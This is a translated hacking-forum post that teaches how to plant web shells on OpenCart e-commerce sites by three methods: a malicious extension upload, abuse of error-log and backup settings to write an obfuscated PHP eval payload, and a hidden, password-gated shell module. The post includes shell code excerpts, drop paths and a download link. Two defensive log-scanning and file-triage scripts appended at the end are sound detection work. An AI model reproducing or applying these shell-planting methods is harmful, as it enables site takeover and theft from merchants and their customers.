Shell to Opencart Site

Extazİ

Moderator
20 Jun 2021

Hello, I will tell you how to shell the opencart site and its basics.


First of all, what is Opencart?
OpenCart is a free, open-source, PHP-based e-commerce platform for people who want to sell online. Its open source code, extensible storefront and user interface make it one of the most preferred packages in the e-commerce world.
Now let's move on to our topic.



Method 1
First, we log in to our OpenCart site. Then we open Installer under 'Extensions' (the puzzle-piece icon).

This brings us to the file upload form, where we upload our file as a zip. We have now uploaded our shell to the site.
You can put the shell you want into the rar file that I have shared.

Now let's go to the shell directory on our site.

The directory where our shell is located:
Code:
site name /catalog/view/theme/mintleaf/template/error/up.php
With this method you can simply install a shell.


Method 2
In this method, it will be enough to follow the steps in the images to install the shell.
I logged into my OpenCart site again. Type setting/setting in the URL and go to the server part. The site is in Chinese, I translated it for you, but generally we always have to switch to the right tab.


After coming to the server part, we go down to the bottom and in the error management part, make the errors yes / yes and write the file name as you want and save it as .php.

After doing this, we go to tool/backup in the URL, or you can reach it from the menu in the same way. Save the code I will give you as opencart.sql or any name you want, with the extension .sql, and click on the download button I marked 2. After doing

This process will happen on some sites and not on others.
When it does, it becomes site.com/system/logs/ghost.php or site.com/system/storage/logs/ghost.php and will bring us an upload section.



With this upload script, we can upload the shell we want.


After installing our shell, we can do whatever we want.
Example image from the shell we installed.
These are the codes we use;
PHP:
SELECT '<?php eval (gzinflate(base64_decode(str_rot13("[encoded payload removed]")))); ?>' FROM `mouwaffek_table`

Open this code in a text editor and save it as .php. You can then start using it.

Method 3

In this method, you can load your own shell instantly by uploading the file I will give. Pretty simple but useful. It may not work on every site, because this method takes the form of adding a module. If there are FTP settings etc. on the site, it may fail because of them, but otherwise you will not have any problems installing a shell. Let us show you how to install it.

Let's go to the extensions section of the admin panel. From there, let's go to the installer part. Upload the file that I will give you in the upload section here and wait for a while.

When the download is complete, if we see "Success", it means that our process is complete.

Normally, when we paste our url, only the error page will appear.

But with the arrangement I made, we come across another good point here. Our shell install point is hidden. If someone other than you tries to enter and does not know what to write, they cannot access the installation part.

It is necessary to write sitename.com/admin/language/en-gb/extension/extension/ghost?gho=st to get to the installation part. Otherwise you cannot install shell. You can do whatever you want by installing your own shell from here.

If we talk about our file, it is a little different from normal shells or upload scripts. The fact that it hides itself and shows itself with the command you type makes this shell unique and superior.

Sample index theme codes of our shell;

The main reason I am including the code is so that you can better understand the logic.
HTML:
<?xml version="1.0" encoding="utf-8"?>
<modification>
    <code>reverse-shell-00001</code>
    <name>Ghost Killer - Anka Red Team | Opencart Shell Uploader</name>
    <version>1.0</version>
    <author>Ghost Killer - TurkHackTeam.ORG </author>
    <link>http://www.zone-h.org/archive/notifier=ZoRRoKiN</link>
    <file path="admin/controller/common/column_left.php">
        <operation>
            <search><![CDATA[if ($maintenance) {]]></search>
            <add position="before"><![CDATA[
            if ($this->user->hasPermission('access', 'extension/extension/shell')) {
                $this->language->load('extension/extension/shell');
                $maintenance[] = array(
                    'name'       => $this->language->get('text_shell'),
                    'href'     => $this->url->link('extension/extension/shell', 'user_token=' . $this->session->data['user_token'], true),
                    'children' => array()
                );
            }
]]></add>
        </operation>
    </file>
</modification>

A sample of our other PHP login page code;
PHP:
<?php

$username = "ghostprv8";
$password = "81b2c659bb4db00a3b500e854a9508cf";
$user = $_POST['user'];
$pass = $_POST['pass'];
$form = "<form method='POST'>
    <center>
    <h1>Ghost Killer - Login Page</h1> <br>
    <br><input type='text' name='user'>
    <br>
    <input type='password' name='pass'>
    <br>
    <br><input type='submit' value='Do you Know the Pass'>
    </form></br>";
    session_start();
    if( !isset($_SESSION['sec']) ){
        $_SESSION['sec'] = false;
    } if(isset($pass)) {
        if($user == $username and md5($pass) == $password) {
            $_SESSION['sec'] = true; }
        else {
            die( "{$form} <br> Hatali Sifre"); }
    } if(!$_SESSION['sec']): echo $form; exit(); endif;
;   

set_time_limit(0);
ini_set('memory_limit', '-1');
$ydLbyOjaJwMEe = array(
    'uspharSWBjZbER' => 'admin',
    'pakQixy' => '7bd34ddcbcc628617578bde1970f18d9',
    'sansLlkDz' => '0',
    'loiLrHCobiZTtPt' => '403',
    'shqCCSCrKDsWXz' => '1',
    'poRYrqfvfDg' => false,
    'cgQnDTfdgULmtuf' => true,
);

Hundreds more lines of PHP code follow this. With our file, you have the opportunity to send any kind of shell to the server.

Therefore, I strongly recommend you to use it.

Click to Download Our Shell: tr.ocmod_.zip (download the file)
Click for Virus Total Results: VirusTotal


Note: I consider the virus detections normal. Shells are generally flagged as viruses anyway; those who want to can use it.

Note 2: Do not use this extension on your own server.

Thank you for reading. Hope to see you on another issue...

original subject: https://www.turkhackteam.org/konular/opencart-siteye-shell-atma.2014125/

subject owner: Ghost Killer
Translator: Alexxb
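
For defenders, the three drop locations named in the post (a theme template directory, the log directory, and a path under `admin/language/`) can be hunted in web server access logs. The following is an added example, not part of the original post or of the shell's code; the log lines are constructed, and it assumes combined log format and the default `admin/` directory name.

```python
import re
from urllib.parse import unquote

# Combined-log-format prefix: client IP, request method, URI, status code.
LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# OpenCart routes pages through index.php, so direct requests for these
# paths should not appear in normal traffic.
RULES = [
    ("php-in-log-dir", re.compile(r"^/system/(?:storage/)?logs/[^?]*\.php", re.I)),
    ("php-in-theme-dir", re.compile(r"^/catalog/view/theme/[^?]*\.php", re.I)),
    ("direct-admin-language", re.compile(r"^/admin/language/", re.I)),
]

# Constructed sample lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [01/Jan/2024:10:00:00 +0000] "GET /index.php?route=common/home HTTP/1.1" 200 5120',
    '203.0.113.9 - - [01/Jan/2024:10:02:11 +0000] "POST /system/storage/logs/ghost.php HTTP/1.1" 200 312',
    '203.0.113.9 - - [01/Jan/2024:10:03:40 +0000] "GET /catalog/view/theme/mintleaf/template/error/up.php HTTP/1.1" 200 840',
    '203.0.113.9 - - [01/Jan/2024:10:05:02 +0000] "GET /admin/language/en-gb/extension/extension/ghost?gho=st HTTP/1.1" 200 660',
    '198.51.100.7 - - [01/Jan/2024:10:06:00 +0000] "GET /catalog/view/theme/default/stylesheet/stylesheet.css HTTP/1.1" 200 9000',
    '203.0.113.9 - - [01/Jan/2024:10:07:19 +0000] "GET /system//logs/ghost%2Ephp HTTP/1.1" 404 210',
]

def scan(lines):
    """Return one finding per log line that matches a rule."""
    hits = []
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue  # not a request line we can parse
        ip, method, uri, status = m.groups()
        # Undo percent-encoding and duplicate slashes before matching.
        path = re.sub(r"/{2,}", "/", unquote(uri))
        for rule, rx in RULES:
            if rx.search(path):
                # "served" separates probes (404) from files that exist.
                hits.append({"rule": rule, "ip": ip, "method": method,
                             "uri": uri, "served": status == "200"})
                break
    return hits

if __name__ == "__main__":
    for hit in scan(SAMPLE):
        print(hit)
```

A hit with `served` set to true means the file exists and was executed by the web server, which makes it the first thing to pull for incident response.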
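
A filesystem triage pass for the artifacts Method 2 leaves behind (an executable file in the log directory, PHP tags inside a log, and the stacked-decoder `eval` wrapper quoted in the post). This is also an added example, not code from the original post; the sample tree is constructed and `PLACEHOLDER` stands in for any payload.

```python
import os
import re
import tempfile

# eval() around two or more stacked decoders, the wrapper used by the
# payload quoted in Method 2.
DECODE_CHAIN = re.compile(
    rb"eval\s*\(\s*(?:(?:gzinflate|gzuncompress|base64_decode|str_rot13)\s*\(\s*){2,}",
    re.I)
LOG_DIRS = ("system/logs", "system/storage/logs")
EXEC_EXT = (".php", ".phtml", ".phar")

def triage(root):
    """Walk an OpenCart tree and return sorted (rule, relative_path) findings."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        rel_dir = os.path.relpath(dirpath, root).replace(os.sep, "/")
        in_logs = any(rel_dir == d or rel_dir.startswith(d + "/") for d in LOG_DIRS)
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            with open(path, "rb") as fh:
                data = fh.read(2_000_000)  # cap the read for very large logs
            if in_logs and name.lower().endswith(EXEC_EXT):
                findings.append(("executable-in-log-dir", rel))
            if in_logs and b"<?php" in data:
                findings.append(("php-tag-in-log", rel))
            if DECODE_CHAIN.search(data):
                findings.append(("stacked-decoder-eval", rel))
    return sorted(findings)

def build_sample_tree():
    """Create a constructed miniature tree for the demonstration."""
    root = tempfile.mkdtemp(prefix="oc-triage-")
    files = {
        "system/storage/logs/error.log": b"PHP Notice: Undefined index: foo\n",
        "system/storage/logs/ghost.php":
            b'PHP Warning: <?php eval (gzinflate(base64_decode(str_rot13("PLACEHOLDER")))); ?>\n',
        "catalog/controller/common/home.php": b"<?php\nclass ControllerCommonHome {}\n",
    }
    for rel, body in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "wb") as fh:
            fh.write(body)
    return root

if __name__ == "__main__":
    for finding in triage(build_sample_tree()):
        print(finding)
```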
 